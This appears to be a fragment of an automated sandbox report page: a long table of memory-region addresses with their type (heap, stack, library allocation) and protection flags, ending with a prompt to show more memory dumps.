trusted library allocation
|
page read and write
|
||
B6DFD7D000
|
stack
|
page read and write
|
||
BD0000
|
heap
|
page read and write
|
||
71DD1A3000
|
stack
|
page read and write
|
||
7FFE166A0000
|
trusted library allocation
|
page read and write
|
||
26455D27000
|
trusted library allocation
|
page read and write
|
||
C0CEEFF000
|
stack
|
page read and write
|
||
25E9A6D0000
|
trusted library allocation
|
page read and write
|
||
71DE70F000
|
stack
|
page read and write
|
||
E23000
|
heap
|
page read and write
|
||
208B2BB0000
|
heap
|
page read and write
|
||
25E9A6F0000
|
trusted library allocation
|
page read and write
|
||
26456C7E000
|
trusted library allocation
|
page read and write
|
||
2645708C000
|
trusted library allocation
|
page read and write
|
||
22022F82000
|
trusted library allocation
|
page read and write
|
||
23500615000
|
trusted library allocation
|
page read and write
|
||
C0CEFFE000
|
stack
|
page read and write
|
||
C0D014B000
|
stack
|
page read and write
|
||
22AD0600000
|
heap
|
page read and write
|
||
7FFE16890000
|
trusted library allocation
|
page read and write
|
||
71DD8F8000
|
stack
|
page read and write
|
||
23518757000
|
heap
|
page read and write
|
||
1BDCBE68000
|
heap
|
page read and write
|
||
22039877000
|
heap
|
page read and write
|
||
760000
|
heap
|
page read and write
|
||
71DD7F9000
|
stack
|
page read and write
|
||
7FFE167C0000
|
trusted library allocation
|
page read and write
|
||
7FFE1657C000
|
trusted library allocation
|
page execute and read and write
|
||
4F6B57E000
|
stack
|
page read and write
|
||
2DC21F70000
|
heap
|
page read and write
|
||
1BDCB9B2000
|
heap
|
page read and write
|
||
7FFE167B0000
|
trusted library allocation
|
page read and write
|
||
25E9C386000
|
trusted library allocation
|
page read and write
|
||
7FFE16810000
|
trusted library allocation
|
page read and write
|
||
1E92CB39000
|
heap
|
page read and write
|
||
22AD26B9000
|
trusted library allocation
|
page read and write
|
||
7FFE16790000
|
trusted library allocation
|
page read and write
|
||
1E92CB30000
|
heap
|
page read and write
|
||
1E92CB4D000
|
heap
|
page read and write
|
||
1BDC94C0000
|
heap
|
page read and write
|
||
3B6CAFF000
|
unkown
|
page read and write
|
||
7FFE167B0000
|
trusted library allocation
|
page read and write
|
||
22AEA9CD000
|
heap
|
page read and write
|
||
7FFE167A0000
|
trusted library allocation
|
page read and write
|
||
D44DE0B000
|
stack
|
page read and write
|
||
23500771000
|
trusted library allocation
|
page read and write
|
||
7FFE167F0000
|
trusted library allocation
|
page read and write
|
||
15FEA244000
|
heap
|
page read and write
|
||
220210F0000
|
heap
|
page read and write
|
||
2201F598000
|
heap
|
page read and write
|
||
26455390000
|
trusted library allocation
|
page read and write
|
||
6C15C7C000
|
stack
|
page read and write
|
||
22AD22E7000
|
heap
|
page read and write
|
||
2BDA8778000
|
heap
|
page read and write
|
||
D44C7B3000
|
stack
|
page read and write
|
||
7FFE16640000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE1655C000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE165D0000
|
trusted library allocation
|
page read and write
|
||
15FE7DCE000
|
heap
|
page read and write
|
||
7FFE16530000
|
trusted library allocation
|
page read and write
|
||
1B8E0000
|
heap
|
page read and write
|
||
235188B0000
|
heap
|
page read and write
|
||
25E9A750000
|
heap
|
page read and write
|
||
264555B0000
|
heap
|
page execute and read and write
|
||
22AE25E8000
|
trusted library allocation
|
page read and write
|
||
71DD877000
|
stack
|
page read and write
|
||
26453A80000
|
trusted library allocation
|
page read and write
|
||
B6DF7F3000
|
stack
|
page read and write
|
||
2BDA87B2000
|
heap
|
page read and write
|
||
6D0000
|
unkown
|
page readonly
|
||
7FFE166D1000
|
trusted library allocation
|
page read and write
|
||
15FE8025000
|
heap
|
page read and write
|
||
2357DE6E000
|
heap
|
page read and write
|
||
23500332000
|
trusted library allocation
|
page read and write
|
||
2BDABE7D000
|
trusted library allocation
|
page read and write
|
||
7FFE16864000
|
trusted library allocation
|
page read and write
|
||
2201F593000
|
heap
|
page read and write
|
||
7FFE16890000
|
trusted library allocation
|
page read and write
|
||
88E63FE000
|
stack
|
page read and write
|
||
7FFE166CA000
|
trusted library allocation
|
page read and write
|
||
1BDC96BA000
|
heap
|
page read and write
|
||
D44D0FF000
|
stack
|
page read and write
|
||
22AD394E000
|
trusted library allocation
|
page read and write
|
||
2357DDC0000
|
heap
|
page read and write
|
||
15FE7F60000
|
heap
|
page read and write
|
||
2646567B000
|
trusted library allocation
|
page read and write
|
||
2646DA70000
|
heap
|
page read and write
|
||
7FFE16503000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE16520000
|
trusted library allocation
|
page read and write
|
||
7FFE16780000
|
trusted library allocation
|
page read and write
|
||
C0CFE8E000
|
stack
|
page read and write
|
||
22021110000
|
heap
|
page read and write
|
||
18E0AA70000
|
heap
|
page read and write
|
||
71DE64D000
|
stack
|
page read and write
|
||
2BDABE8E000
|
trusted library allocation
|
page read and write
|
||
7FFE166C1000
|
trusted library allocation
|
page read and write
|
||
D44CBFD000
|
stack
|
page read and write
|
||
22AD05C0000
|
heap
|
page read and write
|
||
7FFE165B0000
|
trusted library allocation
|
page read and write
|
||
7FFE16730000
|
trusted library allocation
|
page read and write
|
||
22AD22C0000
|
heap
|
page read and write
|
||
7FFE166EA000
|
trusted library allocation
|
page read and write
|
||
22AD06EB000
|
heap
|
page read and write
|
||
B6E00BE000
|
stack
|
page read and write
|
||
BCA000
|
heap
|
page read and write
|
||
15FE7DC9000
|
heap
|
page read and write
|
||
22039B70000
|
heap
|
page read and write
|
||
7FFE167C0000
|
trusted library allocation
|
page read and write
|
||
7FFE16860000
|
trusted library allocation
|
page read and write
|
||
7FFE16710000
|
trusted library allocation
|
page read and write
|
||
2BDA87B7000
|
heap
|
page read and write
|
||
15FE7DBA000
|
heap
|
page read and write
|
||
2646DA99000
|
heap
|
page read and write
|
||
2357E0F5000
|
heap
|
page read and write
|
||
7FFE1653B000
|
trusted library allocation
|
page read and write
|
||
2357DDA0000
|
heap
|
page read and write
|
||
D44DBCE000
|
stack
|
page read and write
|
||
7FFE166F0000
|
trusted library allocation
|
page execute and read and write
|
||
B6E0CCE000
|
stack
|
page read and write
|
||
7FFE167DD000
|
trusted library allocation
|
page read and write
|
||
7FFE16790000
|
trusted library allocation
|
page read and write
|
||
25E9C38F000
|
trusted library allocation
|
page read and write
|
||
1B914000
|
heap
|
page read and write
|
||
7FFE168B7000
|
trusted library allocation
|
page read and write
|
||
7FFE16780000
|
trusted library allocation
|
page read and write
|
||
1BDC956A000
|
heap
|
page read and write
|
||
1BDCB69A000
|
heap
|
page read and write
|
||
25E9C78C000
|
trusted library allocation
|
page read and write
|
||
7FFE167A0000
|
trusted library allocation
|
page read and write
|
||
7FFE165BC000
|
trusted library allocation
|
page execute and read and write
|
||
235188C6000
|
heap
|
page read and write
|
||
2BDAA080000
|
trusted library allocation
|
page read and write
|
||
7FFE16720000
|
trusted library allocation
|
page read and write
|
||
7FFE16710000
|
trusted library allocation
|
page read and write
|
||
2201F510000
|
heap
|
page read and write
|
||
26456CBA000
|
trusted library allocation
|
page read and write
|
||
7F0000
|
heap
|
page read and write
|
||
2BDAA57E000
|
trusted library allocation
|
page read and write
|
||
2646DEF0000
|
heap
|
page read and write
|
||
23500634000
|
trusted library allocation
|
page read and write
|
||
2201F7D0000
|
heap
|
page read and write
|
||
15FE7C90000
|
heap
|
page read and write
|
||
25E9A46A000
|
heap
|
page read and write
|
||
51407FE000
|
stack
|
page read and write
|
||
220396C6000
|
heap
|
page read and write
|
||
7FFE166A2000
|
trusted library allocation
|
page read and write
|
||
22AD28DE000
|
trusted library allocation
|
page read and write
|
||
7FFE167B0000
|
trusted library allocation
|
page read and write
|
||
1B6CE000
|
stack
|
page read and write
|
||
7B7E77E000
|
stack
|
page read and write
|
||
22AEA686000
|
heap
|
page read and write
|
||
B10000
|
heap
|
page read and write
|
||
25EB4A70000
|
heap
|
page read and write
|
||
22AD07D0000
|
trusted library allocation
|
page read and write
|
||
7FFE16510000
|
trusted library allocation
|
page read and write
|
||
D44CDF9000
|
stack
|
page read and write
|
||
26453B2A000
|
heap
|
page read and write
|
||
E10000
|
trusted library allocation
|
page read and write
|
||
25E9C3DB000
|
trusted library allocation
|
page read and write
|
||
7FFE16830000
|
trusted library allocation
|
page read and write
|
||
1BDCBE60000
|
heap
|
page read and write
|
||
25E9A4BF000
|
heap
|
page read and write
|
||
7FFE167D0000
|
trusted library allocation
|
page read and write
|
||
2201F517000
|
heap
|
page read and write
|
||
25EB46D0000
|
heap
|
page read and write
|
||
7FFE165E6000
|
trusted library allocation
|
page read and write
|
||
7FFE167D0000
|
trusted library allocation
|
page read and write
|
||
B40000
|
heap
|
page read and write
|
||
7FFE16710000
|
trusted library allocation
|
page execute and read and write
|
||
26456C90000
|
trusted library allocation
|
page read and write
|
||
EE41BFD000
|
stack
|
page read and write
|
||
7FFE16840000
|
trusted library allocation
|
page read and write
|
||
7FFE16650000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE167D0000
|
trusted library allocation
|
page read and write
|
||
1BDC96BD000
|
heap
|
page read and write
|
||
7FFE16790000
|
trusted library allocation
|
page read and write
|
||
26465671000
|
trusted library allocation
|
page read and write
|
||
25EB45C0000
|
heap
|
page read and write
|
||
7FFE166D0000
|
trusted library allocation
|
page execute and read and write
|
||
D44CEF9000
|
stack
|
page read and write
|
||
23500607000
|
trusted library allocation
|
page read and write
|
||
26453ADD000
|
heap
|
page read and write
|
||
26455640000
|
heap
|
page read and write
|
||
7B7E5FE000
|
stack
|
page read and write
|
||
22020FB0000
|
trusted library allocation
|
page read and write
|
||
7FFE16533000
|
trusted library allocation
|
page execute and read and write
|
||
2646DC8B000
|
heap
|
page read and write
|
||
7FFE16700000
|
trusted library allocation
|
page read and write
|
||
2BDAA501000
|
trusted library allocation
|
page read and write
|
||
88E60FE000
|
stack
|
page read and write
|
||
18E0A7C0000
|
heap
|
page read and write
|
||
7FFE16540000
|
trusted library allocation
|
page read and write
|
||
7FFE16860000
|
trusted library allocation
|
page read and write
|
||
208B2AB0000
|
heap
|
page read and write
|
||
6C15CFF000
|
unkown
|
page read and write
|
||
E7EBBFF000
|
stack
|
page read and write
|
||
7FFE16827000
|
trusted library allocation
|
page read and write
|
||
7FFE16700000
|
trusted library allocation
|
page execute and read and write
|
||
2BDA876B000
|
heap
|
page read and write
|
||
EE41FFF000
|
stack
|
page read and write
|
||
7FFE16850000
|
trusted library allocation
|
page read and write
|
||
B6DFBFD000
|
stack
|
page read and write
|
||
15FE7E14000
|
heap
|
page read and write
|
||
26453B76000
|
heap
|
page read and write
|
||
D44DE8E000
|
stack
|
page read and write
|
||
B6DFF3A000
|
stack
|
page read and write
|
||
28EE000
|
stack
|
page read and write
|
||
71DDA7E000
|
stack
|
page read and write
|
||
7FFE16780000
|
trusted library allocation
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
26453A55000
|
heap
|
page read and write
|
||
15FE7DE6000
|
heap
|
page read and write
|
||
7FFE167D0000
|
trusted library allocation
|
page read and write
|
||
71DD9FF000
|
stack
|
page read and write
|
||
E13000
|
trusted library allocation
|
page read and write
|
||
D44DC4D000
|
stack
|
page read and write
|
||
12AE8000
|
trusted library allocation
|
page read and write
|
||
25E9C2BB000
|
trusted library allocation
|
page read and write
|
||
264554A6000
|
heap
|
page read and write
|
||
2203986C000
|
heap
|
page read and write
|
||
7FFE16512000
|
trusted library allocation
|
page read and write
|
||
2351027E000
|
trusted library allocation
|
page read and write
|
||
235002F3000
|
trusted library allocation
|
page read and write
|
||
26455A0B000
|
trusted library allocation
|
page read and write
|
||
71DD6FE000
|
stack
|
page read and write
|
||
23500377000
|
trusted library allocation
|
page read and write
|
||
25E9C3A3000
|
trusted library allocation
|
page read and write
|
||
7FFE167E0000
|
trusted library allocation
|
page read and write
|
||
2BDAA1B5000
|
heap
|
page read and write
|
||
23518730000
|
heap
|
page read and write
|
||
2201F524000
|
heap
|
page read and write
|
||
6C15D7F000
|
stack
|
page read and write
|
||
C0CF2BE000
|
stack
|
page read and write
|
||
7FFE16750000
|
trusted library allocation
|
page read and write
|
||
26465948000
|
trusted library allocation
|
page read and write
|
||
7FFE166BA000
|
trusted library allocation
|
page read and write
|
||
2BDBA570000
|
trusted library allocation
|
page read and write
|
||
7FFE16740000
|
trusted library allocation
|
page read and write
|
||
C0CF13C000
|
stack
|
page read and write
|
||
235002F7000
|
trusted library allocation
|
page read and write
|
||
235187B0000
|
heap
|
page read and write
|
||
25E9C30A000
|
trusted library allocation
|
page read and write
|
||
71DDBFB000
|
stack
|
page read and write
|
||
7FFE16720000
|
trusted library allocation
|
page read and write
|
||
2646DCB5000
|
heap
|
page read and write
|
||
2201F6F0000
|
heap
|
page read and write
|
||
7FFE16770000
|
trusted library allocation
|
page read and write
|
||
7FFE166D4000
|
trusted library allocation
|
page read and write
|
||
23510244000
|
trusted library allocation
|
page read and write
|
||
264539F0000
|
heap
|
page read and write
|
||
51409FB000
|
stack
|
page read and write
|
||
12AEE000
|
trusted library allocation
|
page read and write
|
||
1BDCB020000
|
heap
|
page read and write
|
||
7FFE16850000
|
trusted library allocation
|
page read and write
|
||
22AEA630000
|
heap
|
page read and write
|
||
25E9C68B000
|
trusted library allocation
|
page read and write
|
||
15FE7D78000
|
heap
|
page read and write
|
||
7FFE165B0000
|
trusted library allocation
|
page read and write
|
||
88E66FD000
|
stack
|
page read and write
|
||
7FFE165E6000
|
trusted library allocation
|
page execute and read and write
|
||
208B2D70000
|
heap
|
page read and write
|
||
25EAC2DE000
|
trusted library allocation
|
page read and write
|
||
7FFE1652B000
|
trusted library allocation
|
page read and write
|
||
22020FB3000
|
trusted library allocation
|
page read and write
|
||
7FFE16770000
|
trusted library allocation
|
page read and write
|
||
7FFE16850000
|
trusted library allocation
|
page read and write
|
||
22AD394C000
|
trusted library allocation
|
page read and write
|
||
1B94A000
|
heap
|
page read and write
|
||
51408FF000
|
stack
|
page read and write
|
||
1BDC9518000
|
heap
|
page read and write
|
||
7FFE165E0000
|
trusted library allocation
|
page read and write
|
||
2646DC70000
|
heap
|
page read and write
|
||
7FFE165B6000
|
trusted library allocation
|
page read and write
|
||
7FFE16760000
|
trusted library allocation
|
page read and write
|
||
2BDC2997000
|
heap
|
page read and write
|
||
7FFE167B0000
|
trusted library allocation
|
page read and write
|
||
51403FE000
|
stack
|
page read and write
|
||
15FE7DE6000
|
heap
|
page read and write
|
||
7FFE16700000
|
trusted library allocation
|
page read and write
|
||
7FFE167C0000
|
trusted library allocation
|
page read and write
|
||
7FFE16820000
|
trusted library allocation
|
page read and write
|
||
7B7E7FE000
|
stack
|
page read and write
|
||
15FE7DD0000
|
heap
|
page read and write
|
||
2DC21BF0000
|
heap
|
page read and write
|
||
22AD201C000
|
heap
|
page read and write
|
||
23500211000
|
trusted library allocation
|
page read and write
|
||
7FFE165E6000
|
trusted library allocation
|
page execute and read and write
|
||
23500200000
|
heap
|
page read and write
|
||
7FFE168C0000
|
trusted library allocation
|
page read and write
|
||
2BDA8730000
|
heap
|
page read and write
|
||
7FFE16870000
|
trusted library allocation
|
page read and write
|
||
264539D0000
|
heap
|
page read and write
|
||
F8D000
|
stack
|
page read and write
|
||
22039820000
|
heap
|
page read and write
|
||
15FE7E23000
|
heap
|
page read and write
|
||
2202146E000
|
heap
|
page read and write
|
||
7FFE166E2000
|
trusted library allocation
|
page read and write
|
||
7FFE16522000
|
trusted library allocation
|
page read and write
|
||
7FFE16510000
|
trusted library allocation
|
page read and write
|
||
7FFE16616000
|
trusted library allocation
|
page execute and read and write
|
||
15FEA6F8000
|
heap
|
page read and write
|
||
EE41EFF000
|
unkown
|
page read and write
|
||
7FFE166D0000
|
trusted library allocation
|
page execute and read and write
|
||
71DD1EE000
|
stack
|
page read and write
|
||
2BDC2759000
|
heap
|
page read and write
|
||
1B5C4000
|
stack
|
page read and write
|
||
7FFE165C0000
|
trusted library allocation
|
page read and write
|
||
22AEA688000
|
heap
|
page read and write
|
||
7FFE167A0000
|
trusted library allocation
|
page read and write
|
||
88E5DDA000
|
stack
|
page read and write
|
||
7FFE166D9000
|
trusted library allocation
|
page read and write
|
||
1BDCB9B1000
|
heap
|
page read and write
|
||
22AEA9D5000
|
heap
|
page read and write
|
||
18E0A83D000
|
heap
|
page read and write
|
||
E7EBAFC000
|
stack
|
page read and write
|
||
22039740000
|
heap
|
page read and write
|
||
22AD0689000
|
heap
|
page read and write
|
||
7FFE16810000
|
trusted library allocation
|
page read and write
|
||
7FFE16710000
|
trusted library allocation
|
page read and write
|
||
7FFE16532000
|
trusted library allocation
|
page read and write
|
||
26455F3B000
|
trusted library allocation
|
page read and write
|
||
7FFE16820000
|
trusted library allocation
|
page read and write
|
||
2BDAA0F3000
|
trusted library allocation
|
page read and write
|
||
26456CB0000
|
trusted library allocation
|
page read and write
|
||
7FFE165C0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE167E0000
|
trusted library allocation
|
page read and write
|
||
22AD4084000
|
trusted library allocation
|
page read and write
|
||
22AD3921000
|
trusted library allocation
|
page read and write
|
||
26465651000
|
trusted library allocation
|
page read and write
|
||
22AEA726000
|
heap
|
page read and write
|
||
22AEA6EE000
|
heap
|
page read and write
|
||
7FFE166B4000
|
trusted library allocation
|
page read and write
|
||
7FFE16750000
|
trusted library allocation
|
page read and write
|
||
7B7E87E000
|
stack
|
page read and write
|
||
7FFE166C0000
|
trusted library allocation
|
page execute and read and write
|
||
25E9C7D1000
|
trusted library allocation
|
page read and write
|
||
2350036A000
|
trusted library allocation
|
page read and write
|
||
1BDC9546000
|
heap
|
page read and write
|
||
1BDC96B0000
|
heap
|
page read and write
|
||
7FFE16530000
|
trusted library allocation
|
page read and write
|
||
7FFE168A0000
|
trusted library allocation
|
page read and write
|
||
2BDA8776000
|
heap
|
page read and write
|
||
1BCBC000
|
stack
|
page read and write
|
||
7FFE16750000
|
trusted library allocation
|
page read and write
|
||
7FFE1654D000
|
trusted library allocation
|
page execute and read and write
|
||
26455A1E000
|
trusted library allocation
|
page read and write
|
||
7FFE16860000
|
trusted library allocation
|
page read and write
|
||
7FFE166A9000
|
trusted library allocation
|
page read and write
|
||
23500879000
|
trusted library allocation
|
page read and write
|
||
2BDA8890000
|
heap
|
page read and write
|
||
1B932000
|
heap
|
page read and write
|
||
1BDCBFE1000
|
heap
|
page read and write
|
||
15FE7DE6000
|
heap
|
page read and write
|
||
C0CFF4F000
|
stack
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
1BDC9539000
|
heap
|
page read and write
|
||
7FFE16770000
|
trusted library allocation
|
page read and write
|
||
7FFE165C6000
|
trusted library allocation
|
page read and write
|
||
1BDC9567000
|
heap
|
page read and write
|
||
1BDC9510000
|
heap
|
page read and write
|
||
22023323000
|
trusted library allocation
|
page read and write
|
||
3B6C7DD000
|
stack
|
page read and write
|
||
7FFE16810000
|
trusted library allocation
|
page read and write
|
||
208B2A60000
|
heap
|
page read and write
|
||
25E9C289000
|
trusted library allocation
|
page read and write
|
||
2357E0F0000
|
heap
|
page read and write
|
||
7FFE16620000
|
trusted library allocation
|
page execute and read and write
|
||
7FFE1658C000
|
trusted library allocation
|
page execute and read and write
|
||
22AEA960000
|
heap
|
page read and write
|
||
7FFE16523000
|
trusted library allocation
|
page execute and read and write
|
||
2646DAF5000
|
heap
|
page read and write
|
||
22AD064B000
|
heap
|
page read and write
|
||
D44CCFE000
|
stack
|
page read and write
|
||
12AF1000
|
trusted library allocation
|
page read and write
|
||
26455877000
|
trusted library allocation
|
page read and write
|
There are 1071 hidden memdumps, click here to show them.